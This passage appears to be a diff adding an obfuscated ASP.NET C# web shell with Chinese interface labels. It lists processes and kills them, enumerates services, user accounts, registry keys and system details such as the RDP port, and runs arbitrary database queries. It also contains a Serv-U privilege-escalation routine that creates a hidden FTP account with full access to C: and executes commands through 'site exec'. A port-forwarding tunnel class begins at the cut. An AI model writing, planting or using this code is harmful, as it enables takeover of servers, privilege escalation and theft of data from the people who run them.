+tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
+break;
+case 4:
+StringBuilder sb=new StringBuilder();
+PropertyValueCollection pc=child.Properties["ServerBindings"];
+for (int j=0; j < pc.Count; j++)
+{
+sb.Append(pc[j].ToString()+"<br>");
+}
+tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
+break;
+case 5:
+tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
+break;
+}
+TR.Cells.Add(tfit);
+}
+catch (Exception ex)
+{
+xseuB(ex.Message);
+continue;
+}
+}
+GlI.Controls.Add(TR);
+}
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+}
+}
+public ManagementObjectCollection PhQTd(string query)
+{
+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
+return QS.Get();
+}
+public DataTable cCf(string query)
+{
+DataTable dt=new DataTable();
+int i=0;
+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
+try
+{
+foreach(ManagementObject m in QS.Get())
+{
+DataRow dr=dt.NewRow();
+PropertyDataCollection.PropertyDataEnumerator oEnum;
+oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
+while(oEnum.MoveNext())
+{
+PropertyData DRU=(PropertyData)oEnum.Current;
+if(dt.Columns.IndexOf(DRU.Name)==-1)
+{
+dt.Columns.Add(DRU.Name);
+dt.Columns[dt.Columns.Count-1].DefaultValue="";
+}
+if(m[DRU.Name]!=null)
+{
+dr[DRU.Name]=m[DRU.Name].ToString();
+}
+else
+{
+dr[DRU.Name]=string.Empty;
+}
+}
+dt.Rows.Add(dr);
+}
+}
+catch(Exception error)
+{
+}
+return dt;
+}
+public void YUw()
+{
+try
+{
+Bin_H2_Title.InnerText="系统进程 >>";
+WICxe();
+DCbS.Visible=true;
+int UEbTI=0;
+Process[] p=Process.GetProcesses();
+foreach(Process sp in p)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=sp.Id.ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=sp.ProcessName.ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=sp.Threads.Count.ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+td.Text=sp.BasePriority.ToString();
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+td.Text="--";
+tr.Controls.Add(td);
+}
+}
+IjsL.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+AIz();
+}
+AIz();
+}
+public void AIz()
+{
+try
+{
+Bin_H2_Title.InnerText="系统进程 >>";
+WICxe();
+DCbS.Visible=true;
+int UEbTI=0;
+DataTable dt=cCf("Win32_Process");
+for(int j=0;j<dt.Rows.Count;j++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=dt.Rows[j]["ProcessID"].ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=dt.Rows[j]["Name"].ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=dt.Rows[j]["ThreadCount"].ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+td.Text=dt.Rows[j]["Priority"].ToString();
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+if( dt.Rows[j]["CommandLine"]!=string.Empty)
+{
+td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
+}
+else
+{
+td.Text="--";
+}
+tr.Controls.Add(td);
+}
+}
+IjsL.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void urJG(string pid)
+{
+try
+{
+foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
+{
+p.InvokeMethod("Terminate",null);
+p.Dispose();
+}
+xseuB("Process Kill Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+AIz();
+}
+public void oHpF()
+{
+try
+{
+Bin_H2_Title.InnerText="系统服务 >>";
+WICxe();
+iQxm.Visible=true;
+int UEbTI=0;
+ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
+for(int i=0;i<kQmRu.Length;i++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int b=1;b<7;b++)
+{
+TableCell td=new TableCell();
+if(b==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(b==2)
+{
+td.Text="null";
+tr.Controls.Add(td);
+}
+if(b==3)
+{
+td.Text=kQmRu[i].ServiceName.ToString();
+tr.Controls.Add(td);
+}
+if(b==4)
+{
+td.Text="";
+tr.Controls.Add(td);
+}
+if(b==5)
+{
+string kOIo=kQmRu[i].Status.ToString();
+if(kOIo=="Running")
+{
+td.Text="<font color=green>"+kOIo+"</font>";
+}
+else
+{
+td.Text="<font color=red>"+kOIo+"</font>";
+}
+tr.Controls.Add(td);
+}
+if(b==6)
+{
+td.Text="";
+tr.Controls.Add(td);
+}
+}
+vHCs.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void tZRH()
+{
+try
+{
+Bin_H2_Title.InnerText="系统服务 >>";
+WICxe();
+iQxm.Visible=true;
+int UEbTI=0;
+DataTable dt=cCf("Win32_Service");
+for(int j=0;j<dt.Rows.Count;j++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=dt.Rows[j]["ProcessID"].ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=dt.Rows[j]["Name"].ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=dt.Rows[j]["PathName"].ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+string kOIo=dt.Rows[j]["State"].ToString();
+if(kOIo=="Running")
+{
+td.Text="<font color=green>"+kOIo+"</font>";
+}
+else
+{
+td.Text="<font color=red>"+kOIo+"</font>";
+}
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+td.Text=dt.Rows[j]["StartMode"].ToString();
+tr.Controls.Add(td);
+}
+}
+vHCs.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+oHpF();
+}
+}
+public void PLd()
+{
+try
+{
+WICxe();
+xWVQ.Visible=true;
+Bin_H2_Title.InnerText="用户(组)信息 >>";
+DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
+foreach(DirectoryEntry child in TWQ.Children)
+{
+foreach(string name in child.Properties.PropertyNames)
+{
+PropertyValueCollection pvc=child.Properties[name];
+int c=pvc.Count;
+for(int i=0;i<c;i++)
+{
+if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
+{
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+TableCell td=new TableCell();
+td.Text=name;
+tr.Controls.Add(td);
+TableCell td1=new TableCell();
+td1.Text=pvc[i].ToString();
+tr.Controls.Add(td1);
+VPa.Controls.Add(tr);
+}
+}
+}
+TableRow trn=new TableRow();
+for(int x=1;x<3;x++)
+{
+TableCell tdn=new TableCell();
+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
+trn.Controls.Add(tdn);
+VPa.Controls.Add(trn);
+}
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void iLVUT()
+{
+try
+{
+WICxe();
+xWVQ.Visible=true;
+Bin_H2_Title.InnerText="用户(组)信息 >>";
+DataTable user=cCf("Win32_UserAccount");
+for(int i=0;i<user.Rows.Count;i++)
+{
+for(int j=0;j<user.Columns.Count;j++)
+{
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+TableCell td=new TableCell();
+td.Text=user.Columns[j].ToString();
+tr.Controls.Add(td);
+TableCell td1=new TableCell();
+td1.Text=user.Rows[i][j].ToString();
+tr.Controls.Add(td1);
+VPa.Controls.Add(tr);
+}
+TableRow trn=new TableRow();
+for(int x=1;x<3;x++)
+{
+TableCell tdn=new TableCell();
+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
+trn.Controls.Add(tdn);
+VPa.Controls.Add(trn);
+}
+}
+}
+catch(Exception error)
+{
+PLd();
+}
+}
+public void pDVM()
+{
+try
+{
+RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
+string IKjwH=DdmPl(EeZ,"PortNumber");
+RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
+int cpu=izN.SubKeyCount;
+RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
+string NPPZ=DdmPl(mQII,"ProcessorNameString");
+WICxe();
+ghaB.Visible=true;
+Bin_H2_Title.InnerText="系统信息 >>";
+Bin_H2_Mac.InnerText="网卡信息 >>";
+Bin_H2_Driver.InnerText="驱动信息 >>";
+StringBuilder yEwc=new StringBuilder();
+StringBuilder hwJeS=new StringBuilder();
+StringBuilder jXkaE=new StringBuilder();
+yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
+yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
+yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
+yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
+yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
+yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
+yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
+yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
+DataTable BIOS=cCf("Win32_BIOS");
+yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
+yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
+yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
+DataTable upM=cCf("Win32_PhysicalMemory");
+Int64 oZnZV=0;
+for(int i=0;i<upM.Rows.Count;i++)
+{
+oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
+}
+yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
+DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
+for(int i=0;i<dOza.Rows.Count;i++)
+{
+hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
+if(dOza.Rows[i]["MACAddress"]!=string.Empty)
+{
+hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
+}
+}
+DataTable Driver=cCf("Win32_SystemDriver");
+for (int i=0; i<Driver.Rows.Count; i++)
+{
+jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
+if (Driver.Rows[i]["PathName"]!=string.Empty)
+{
+jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
+}
+else
+{
+jXkaE.Append("No path information");
+}
+jXkaE.Append("</li>");
+}
+Bin_Ul_Sys.InnerHtml=yEwc.ToString();
+Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
+Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void ADCpk()
+{
+WICxe();
+APl.Visible=true;
+Bin_H2_Title.InnerText="Serv-U 提权 >>";
+}
+public void lDODR()
+{
+string JGGg=string.Empty;
+string user=dNohJ.Value;
+string pass=NMd.Value;
+int port=Int32.Parse(HlQl.Value);
+string cmd=mHbjB.Value;
+string CRtK="user "+user+"\r\n";
+string jnNG="pass "+pass+"\r\n";
+string site="SITE MAINTENANCE\r\n";
+string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
+string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
+string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
+string zexn="QUIT\r\n";
+UHlA.Visible=true;
+try
+{
+tcp.Connect("127.0.0.1",port);
+tcp.ReceiveBufferSize=1024;
+NS=tcp.GetStream();
+Rev(NS);
+ZJiM(NS,CRtK);
+Rev(NS);
+ZJiM(NS,jnNG);
+Rev(NS);
+ZJiM(NS,site);
+Rev(NS);
+ZJiM(NS,mtoJb);
+Rev(NS);
+ZJiM(NS,sutI);
+Rev(NS);
+ZJiM(NS,iVDT);
+Rev(NS);
+Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
+zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
+NS1=zvxm.GetStream();
+Rev(NS1);
+ZJiM(NS1,"user bin\r\n");
+Rev(NS1);
+ZJiM(NS1,"pass binftp\r\n");
+Rev(NS1);
+ZJiM(NS1,"site exec "+cmd+"\r\n");
+Rev(NS1);
+ZJiM(NS1,"quit\r\n");
+Rev(NS1);
+zvxm.Close();
+ZJiM(NS,mtoJb);
+Rev(NS);
+tcp.Close();
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+protected void Rev(NetworkStream instream)
+{
+string FTBtf=string.Empty;
+if(instream.CanRead)
+{
+byte[] uPZ=new byte[1024];
+do
+{
+System.Threading.Thread.Sleep(50);
+int len=instream.Read(uPZ,0,uPZ.Length);
+FTBtf+=Encoding.Default.GetString(uPZ,0,len);
+}
+while(instream.DataAvailable);
+}
+Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
+}
+protected void ZJiM(NetworkStream instream,string Sendstr)
+{
+if(instream.CanWrite)
+{
+byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
+instream.Write(uPZ,0,uPZ.Length);
+}
+Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
+}
+public void xFhz()
+{
+WICxe();
+kkHN.Visible=true;
+Bin_H2_Title.InnerText="注册表查询 >>";
+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
+vyX.Text="";
+foreach(string rootkey in txc.Split('|'))
+{
+vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
+}
+lFAvw();
+}
+protected void lFAvw()
+{
+qPdI.Text="";
+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
+TableRow tr;
+TableCell tc;
+foreach(string rootkey in txc.Split('|'))
+{
+tr=new TableRow();
+tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text="&lt;RootKey&gt;";
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+}
+protected void tpRQ(string Reg_Path)
+{
+if(!Reg_Path.EndsWith("\\"))
+{
+Reg_Path=Reg_Path+"\\";
+}
+qPdI.Text=Reg_Path;
+string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
+cJG=Regex.Replace(cJG,@"\\+","\\");
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
+tc.Attributes["colspan"]="2" ;
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+try
+{
+string subpath;
+string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
+RegistryKey rk=null;
+RegistryKey sk;
+if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
+{
+rk=Registry.LocalMachine;
+}
+else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
+{
+rk=Registry.ClassesRoot;
+}
+else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
+{
+rk=Registry.CurrentUser;
+}
+else if(Reg_Path.StartsWith("HKEY_USERS"))
+{
+rk=Registry.Users;
+}
+else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
+{
+rk=Registry.CurrentConfig;
+}
+if(kDgkX.Length>1)
+{
+sk=rk.OpenSubKey(kDgkX);
+}
+else
+{
+sk=rk;
+}
+foreach(string innerSubKey in sk.GetSubKeyNames())
+{
+tr=new TableRow();
+tc=new TableCell();
+bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text="&lt;SubKey&gt;";
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+TableRow cKVA=new TableRow();
+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
+cKVA.Attributes["bgcolor"]="#dddddd";
+TableCell JlmW=new TableCell();
+JlmW.Attributes["colspan"]="2" ;
+JlmW.Attributes["height"]="5";
+cKVA.Cells.Add(JlmW);
+pLWD.Rows.Add(cKVA);
+foreach(string strValueName in sk.GetValueNames())
+{
+tr=new TableRow();
+tc=new TableCell();
+bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text=strValueName;
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text=DdmPl(sk,strValueName);
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public string DdmPl(RegistryKey sk,string strValueName)
+{
+object uPZ;
+string RaTGr="";
+try
+{
+uPZ=sk.GetValue(strValueName,"NULL");
+if(uPZ.GetType()==typeof(byte[]))
+{
+foreach(byte tmpbyte in(byte[])uPZ)
+{
+if((int)tmpbyte<16)
+{
+RaTGr+="0";
+}
+RaTGr+=tmpbyte.ToString("X");
+}
+}
+else if(uPZ.GetType()==typeof(string[]))
+{
+foreach(string tmpstr in(string[])uPZ)
+{
+RaTGr+=tmpstr;
+}
+}
+else
+{
+RaTGr=uPZ.ToString();
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+return RaTGr;
+}
+public void vNCHZ()
+{
+WICxe();
+YwLB.Visible=true;
+Bin_H2_Title.InnerText="端口扫描 >>";
+}
+public void rAhe()
+{
+WICxe();
+iDgmL.Visible=true;
+dQIIF.Visible=false;
+Bin_H2_Title.InnerText="数据库 >>";
+}
+protected void OUj()
+{
+if(Dtdr.State==ConnectionState.Closed)
+{
+try
+{
+Dtdr.ConnectionString=MasR.Text;
+Kkvb.Connection=Dtdr;
+Dtdr.Open();
+}
+catch(Exception Error)
+{
+xseuB(Error.Message);
+}
+}
+}
+protected void fUzE()
+{
+if(Dtdr.State==ConnectionState.Open)
+Dtdr.Close();
+Dtdr.Dispose();
+Kkvb.Dispose();
+}
+public DataTable CYUe(string sqlstr)
+{
+OleDbDataAdapter da=new OleDbDataAdapter();
+DataTable Dstog=new DataTable();
+try
+{
+OUj();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=sqlstr;
+da.SelectCommand=Kkvb;
+da.Fill(Dstog);
+}
+catch(Exception)
+{
+}
+finally
+{
+fUzE();
+}
+return Dstog;
+}
+public DataTable[] Bin_Data(string query)
+{
+ArrayList list=new ArrayList();
+try
+{
+string str;
+OUj();
+query=query+"\r\n";
+MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
+int EmRX=0;
+for(int i=0;i<gcod.Count;i++)
+{
+Match FJD=gcod[i];
+str=query.Substring(EmRX,FJD.Index-EmRX);
+if(str.Trim().Length>0)
+{
+OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=str.Trim();
+FgzeQ.SelectCommand=Kkvb;
+DataSet cDPp=new DataSet();
+FgzeQ.Fill(cDPp);
+for(int j=0;j<cDPp.Tables.Count;j++)
+{
+list.Add(cDPp.Tables[j]);
+}
+}
+EmRX=FJD.Index+3;
+}
+str=query.Substring(EmRX,query.Length-EmRX);
+if(str.Trim().Length>0)
+{
+OleDbDataAdapter VwB=new OleDbDataAdapter();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=str.Trim();
+VwB.SelectCommand=Kkvb;
+DataSet arG=new DataSet();
+VwB.Fill(arG);
+for(int k=0;k<arG.Tables.Count;k++)
+{
+list.Add(arG.Tables[k]);
+}
+}
+}
+catch(SqlException e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+return(DataTable[])list.ToArray(typeof(DataTable));
+}
+public void JIAKU(string instr)
+{
+try
+{
+OUj();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=instr;
+Kkvb.ExecuteNonQuery();
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+}
+}
+public void dwgT()
+{
+try
+{
+OUj();
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+if(Pvf.SelectedItem.Value!="")
+{
+Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
+}
+}
+DataTable[] jxF=null;
+jxF=Bin_Data(jHIy.InnerText);
+if(jxF!=null && jxF.Length>0)
+{
+for(int j=0;j<jxF.Length;j++)
+{
+rom.PreRender+=new EventHandler(lRavM);
+rom.DataSource=jxF[j];
+rom.DataBind();
+for(int i=0;i<rom.Items.Count;i++)
+{
+string bg=OKM();
+rom.Items[i].CssClass=bg;
+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
+}
+}
+}
+else
+{
+rom.DataSource=null;
+rom.DataBind();
+}
+rom.Visible=true;
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+}
+public void xTZY()
+{
+try
+{
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+if(Pvf.SelectedItem.Value=="")
+{
+rom.DataSource=null;
+rom.DataBind();
+return;
+}
+}
+OUj();
+DataTable zKvOw=new DataTable();
+DataTable jxF=new DataTable();
+DataTable baVJV=new DataTable();
+if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
+{
+Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
+}
+zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
+jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
+foreach(DataRow dr in zKvOw.Rows)
+{
+jxF.ImportRow(dr);
+}
+jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
+rom.PreRender+=new EventHandler(lRavM);
+rom.DataSource=jxF;
+rom.DataBind();
+for(int i=0;i<rom.Items.Count;i++)
+{
+string bg=OKM();
+rom.Items[i].CssClass=bg;
+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
+}
+rom.Visible=true;
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+}
+private void lRavM(object sender,EventArgs e)
+{
+DataGrid d=(DataGrid)sender;
+foreach(DataGridItem item in d.Items)
+{
+foreach(TableCell t in item.Cells)
+{
+t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
+}
+}
+}
+public void vCf()
+{
+dQIIF.Visible=true;
+try
+{
+jHIy.InnerHtml=string.Empty;
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+rom.Visible=false;
+uXevN.Visible=true;
+irTU.Visible=true;
+OUj();
+DataTable ver=CYUe(@"SELECT @@VERSION");
+DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
+DataTable cdb=CYUe(@"SELECT DB_NAME()");
+DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
+DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
+string jHlh=ver.Rows[0][0].ToString();
+string dbo=string.Empty;
+if(YKrm.Rows[0][0].ToString()=="1")
+{
+dbo="db_owner";
+}
+else
+{
+dbo="public";
+}
+if(rol.Rows[0][0].ToString()=="1")
+{
+dbo="<font color=blue>sa</font>";
+}
+string db_name=string.Empty;
+foreach(ListItem item in FGEy.Items)
+{
+ if(item.Selected=true)
+ {
+ item.Selected=false;
+ }
+}
+Pvf.Items.Clear();
+Pvf.Items.Add("-- Select a DataBase --");
+Pvf.Items[0].Value="";
+for(int i=0;i<dbs.Rows.Count;i++)
+{
+db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
+Pvf.Items.Add(dbs.Rows[i][0].ToString());
+}
+irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
+}
+else
+{
+uXevN.Visible=false;
+irTU.Visible=false;
+xTZY();
+}
+}
+catch(Exception e)
+{
+dQIIF.Visible=false;
+}
+}
+public void MHLv()
+{
+WICxe();
+hOWTm.Visible=true;
+Bin_H2_Title.InnerText="端口映射 >>";
+}
+public class PortForward
+{
+public string Localaddress;
+public int LocalPort;
+public string RemoteAddress;
+public int RemotePort;
+string type;
+Socket ltcpClient;
+Socket rtcpClient;
+Socket server;
+byte[] DPrPL=new byte[2048];
+byte[] wvZv=new byte[2048];
+public struct session
+{
+public Socket rdel;
+public Socket ldel;
+public int llen;
+public int rlen;
+}
+public static IPEndPoint mtJ(string host,int port)
+{
+IPEndPoint iep=null;
+IPHostEntry aGN=Dns.Resolve(host);
+IPAddress rmt=aGN.AddressList[0];
+iep=new IPEndPoint(rmt,port);
+return iep;
+}
+public void Start(string Rip,int Rport,string lip,int lport)
+{
+try
+{
